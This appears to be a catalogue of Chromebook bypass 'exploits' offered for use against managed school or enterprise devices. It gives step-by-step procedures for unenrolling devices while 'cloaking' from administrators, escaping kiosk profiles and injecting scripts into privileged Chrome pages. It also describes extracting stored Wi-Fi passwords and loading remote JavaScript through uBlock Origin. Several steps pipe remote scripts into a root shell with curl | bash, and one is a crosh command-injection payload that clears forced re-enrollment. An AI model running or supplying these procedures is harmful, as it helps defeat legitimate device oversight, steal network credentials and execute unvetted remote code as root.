Only works on Chrome OS v135-7
Unenrolls your Chromebook, removing ALL restrictions.
Created by the crosbreaker team.
Chrome OS-based exploit.
sh1ttyOOBE.mp4
1: Check your kernver by entering Recovery Mode (Esc+Refresh+Power) & pressing Tab.
2: Look at the text in the top-left corner. If the number doesn't end in 5, your Chromebook is unsupported.
3: Powerwash your Chromebook, then on the "Welcome to your Chromebook" screen wait until you see the "Quick set up with Android" button. Do not click "Get Started" if it doesn't show immediately.
4: Press Ctrl+Shift+R & click "Cancel".
5: Click "Enter your google account email & password" & it should say to "Connect to a network".
6: Open quick settings & connect to a network.
7: Enable "MAC Address Randomization" in chrome://flags to cloak yourself.
Other:
A: After signing in you can sign out, which will return you to the welcome screen. From here, proceed with OOBE & sign in with the same email, then when you sign in it will hang on the "Please wait" screen.
Afterwards, simply restart or press Alt+Volume Up+X to return to the lockscreen. This will persist until the next powerwash.
B: After gaining persistance via the above instruction, you can simply boot modified recovery images in unverified Recovery Mode.
Afterwards, you can also preform BadBr0ker & BadSH1MMER.
Requires a storage device, Dev Mode; patched on keyrolled devices
Allows you to boot Linux or Chrome OS from an external storage device without modifying your Chromebook.
Use Appleboot on keyrolled devices.
Chrome OS-based exploit.
Shimboot.mp4
1: Find your Chromebook’s board name by going to chrome://version, it will be behind “stable-channel”.
2: Get your Chromebook’s RMA shim from chrome100.dev & run the commands below or download a prebuilt one from here.
3: Flash it onto an external storage device.
4: Enable Dev Mode & then plug in the storage device & reenter Recovery Mode (Esc+Refresh+Power).
5: Boot into Linux & log in. The default is user/user.
6: Expand the rootfs partition so that it fills up the entire disk by running "sudo growpart /dev/sdX 4" (replacing sdX with the block device corresponding to your disk) to expand the partition, then run "sudo resize2fs /dev/sdX4" to expand the filesystem.
1: Get code execution in an extension. This extension will need to have the "tabs", "activeTab", & "browserAction" permissions as well as 'unsafe-eval' set in the CSP.
2: Enable the flag "#extensions-on-chrome-urls".
3: Get a bookmarklet & place it as follows: chrome.browserAction.onClicked.addListener(() => {chrome.tabs.executeScript(null, {code: `location.href="javascript:bookmarklet";`});});
4: Open the URL you want this code to run on & click the extension icon.
Requires extension Developer Mode
An extension that allows you to download other extensions.
Web-based exploit.
Skebstore.mp4
1: Download the folder from the GitHub page or here.
2: Go to chrome://extensions & enable extension Developer Mode.
3: Click "Load unpacked" & select the folder (unzip it if needed).
4: Click the extension to go to the Skebstore install page.
5: Insert an extension's ID & download it.
2: Enable the Snap&Read toolbar.
3: Enter any text into the outline topic's editable text area.
4: Click the bullet point of the topic.
5: Click the "Link to Source" option.
6: Click the "+" button at the bottom right.
7: Switch to the website tab.
8: In the Article/Page title input field, enter the name of your chosen bookmarklet.
9: Click "Save" & switch to the outline tab.
10: In the Snap&Read toolbar, click the "Hide Outlines" button.
Execution:
11: In the Snap&Read toolbar, click the "Show Outlines" button.
12: In your created outline, click the link separated by parenthesis that contains the bookmarklet.
13: Click the "Hide Outlines" button.
Requires the ability to view a page’s source code
Reconstructs a web page from its source code.
Web-based "exploit".
1: Go to a website & view its source code with Ctrl+U or by using the View Source bookmarklet.
2: Copy everything from the newly opened tab & paste it in a site like this.
Requires a CAUB'd Wi-Fi network
Find the Wi-Fi password for CAUB'd Wi-Fi networks.
Web-based exploit.
SIPE.mp4
1: CAUB the Wi-Fi network you want to get the password from.
2: Go here & type the name of the Wi-Fi network.
3: Click the majik (TM) button, it will tell you what you'll need to press in step 6.
4: Go to chrome://sync-internals/ in a new tab & click the "Search" tab.
5: Type "Wi-Fi_" in the textbox & click "Search".
6: Click the name of the Wi-Fi you got from step 3 & copy all the data. Note that it might be a longer string than what it says on SIPE.
7: Go back to SIPE & paste the data in the textbox, then click the majik button (TM).
Requires Sh0vel, Extension Dev Mode, Crosh; patched on Chrome OS 127+
Run scripts in Chrome pages.
Web-based exploit.
1: Enter a kiosk profile with SKIOVOX.
2: Download the ZIP from here.
3: Navigate to chrome://extensions & enable Extension Dev Mode, then load the extension.
4: Navigate to chrome-untrusted://crosh & run "vmc create-extra-disk --size=1 /home/chronos/user/MyFiles/Downloads/opener.txt". It should return "A raw disk is created at /home/chronos/user/MyFiles/Downloads/opener.txt."
5: Open a new tab. If the default New Tab page loads, install the SKIOVOX Helper extension in a new tab before proceeding.
6: Click the folder icon in the bottom right. The file manager should open. Navigate to "Downloads".
7: Open the opener.txt file. A new window should open with a blank page tab. This window is managed by your organization.
8: Open a new tab & close the blank page tab.
9: Navigate to chrome://extensions & open the details page of the extension you previously chose to install in your managed profile. Copy its extension ID.
10: Return to the regular window that is not managed by your organization.
11: Activate the Skiovox Breakout extension.
12: In the input field for the extension ID, enter the ID of the extension you previously chose to install in your managed profile.
13: Set the textarea text to the script you want to run.
14: Click Start injection.
Loading the Tr3nch Menu:
1: Navigate to chrome://flags & enable the "extensions-on-chrome-urls" flag.
2: Click "Restart" then navigate to chrome://os-settings, chrome://setttings, chrome://extensions, chrome://chrome-signin, chrome://inspect, chrome://file-manager, chrome://network, or chrome://oobe.
3: Click the extensions extension icon in the toolbar.
4: Click & activate the extension with the injected script. The Tr3nch menu should launch.
uBlock Origin exclusive
Unblocks bookmarklets. Older version of uRun.
Web-based exploit.
1: Go to uBlock Origin’s settings page & check the “I am an advanced user” box, then click on the small cog icon.
2: Find “userResourcesLocation unset" & change it from "unset" to "https://raw.githubusercontent.com/3kh0/ext-remover/main/ublockExec.js".
3: Go to the “My filters” tab & add a line with “*##+js(execute_script.js)”, then run the code on the current page (Ctrl+Alt+~).
Requires Dev Mode, external storage device
Allows you to boot from an external storage device. See Shimboot for booting Linux from an external storage device
USBoot.mp4
1: Enable Dev Mode (Esc+Power+Refresh).
2: After selecting "boot from internal disk", press Ctrl+Alt+F2.
3: Run "sudo crossystem dev_boot_usb=1". Note that if the GBB flag that ignores this is set you can skip this step.
Press "Ctrl+U" on the OS Verification screen to boot from the external storage.
uBlock Origin exclusive
Unblocks bookmarklets. Updated version of uBlock Run.
Web-based exploit.
uRun.mp4
1: Go to uBlock Origin’s settings page & check the “I am an advanced user” box, then click on the small cog icon.
2: Find “userResourcesLocation unset" & change it to "https://inglan2.github.io/uRun/urun.js".
3: Go to the “My filters” tab & add a line with “*##+js(urun.js)”, then run the code on the current page (Ctrl+Alt+~).
Press "Ctrl+Shift+`" to open the menu, where you can run & create scripts. To add a script, click the ➕ button & enter the code without the "javascript:" part.
Requires Dev Mode
Gives you the password to a Wi-Fi network.
1: Enter Dev Mode & open Crosh (Ctrl+Alt+T).
2: Run the commands "shell", "sudo su", & "cd home/root", then type "ls" & copy the middle code string.
3: Run the command "cd [code string here]" & type "ls" again. Enter "more shill/shill.profile".
4: Enter "more shill/shill.profile".
5: Eventually, you’ll see a username appear. Scroll up in Crosh until you see the SSID (network ID). Copy the passphrase code (below the SSID & after the colon).
6: Run the command "echo [passphrase] | tr ‘!-~’ ‘P-~!-O’."
Patched on Chrome OS 101+
Unenrolls your Chromebook using Crosh.
Unenroll:
1: Open Crosh (Ctrl+Alt+T).
2: Run "set_cellular_ppp \';dbus-send${IFS}--system${IFS}--print-reply${IFS}--dest=org.chromium.SessionManager${IFS}/org/chromium/SessionManager${IFS}org.chromium.SessionManagerInterface.ClearForcedReEnrollmentVpd;exit;\'"
3: Powerwash your Chromebook (Ctrl+Alt+Shift+R).
4: Enable "MAC Address Randomization" in chrome://flags to cloak yourself.
Re-enroll:
1: Open a bash shell & run "sudo -i", "vpd -i RW_VPD -s check_enrollment=1", "echo "fast safe" > /mnt/stateful_partition/factory_install_reset", & "reboot".
Requires Dev Mode; patched on version 117+
Allows you to have Dev Mode permissions while in Safe Mode. Succeeded by Murkmod
1: Check your kernver by entering Recovery Mode (Esc+Refresh+Power) & pressing Tab.
2: Look at the text in the top-left corner. If the kernver text ends in 4+, your Chromebook is unsupported.
4: Enter Dev Mode.
5: Go to chrome-untrusted://crosh & run the commands "shell", “sudo -i”, & “bash <(curl -SLk https://github.com/MercuryWorkshop/fakemurk/releases/latest/download/fakemurk.sh)”. Follow everything it says. If you get an error about a filesystem being readonly, run “fsck -f $(rootdev)” & reboot.
If you get stuck on the enrollment screen, enter Dev Mode with Ctrl+D, then press Refresh+Power & then space on the OS Verification screen. You will be on a “Chrome OS is missing or damaged” screen. Enter Dev Mode & when you get back to the OS verification screen press Ctrl+D to boot.
Don't use the sign out button as it will freeze your computer. Use Power+Refresh or Reboot in Crosh instead.
Mush will be installed with Fakemurk.
While Fakemurk is installed, you can make a folder called “disable-extensions” to disable extensions.
1: Open Crosh (Ctrl+Alt+T) & run the “vmc” command. If you get a list of subcommands, then continue.
2: Powerwash then sign in & disable Wi-Fi immediately.
3: Go to chrome://extensions & enable your internet, then immediately disable it when an extension is installed.
4: Open Crosh & for each extension you want to disable, run the command “vmc create-extra-disk --size 1 /home/chronos/user/Extensions/{extensionID}” or run “vmc create-extra-disk --size 1 /home/chronos/user/Extensions”" to disable all.
5: Reenable Wi-Fi.
Requires Dev Mode; patched on Chrome OS 131+
Changes your Chromebook's policy.
Chrome OS-based exploit.
1: Enter Dev Mode (Esc+Power+Refresh) & open Crosh (Ctrl+Alt+T).
2: Run the following commands: “shell”, “sudo su”, & “curl -Ls https://mercuryworkshop.github.io/Pollen/Pollen.sh | bash”.
A: If the policy doesn’t apply, press Alt+Vol Up+X.
3: Reboot, repeat steps 1 & 2, then run this command: "curl -Ls https://mercuryworkshop.github.io/Pollen/PollenFS.sh | bash".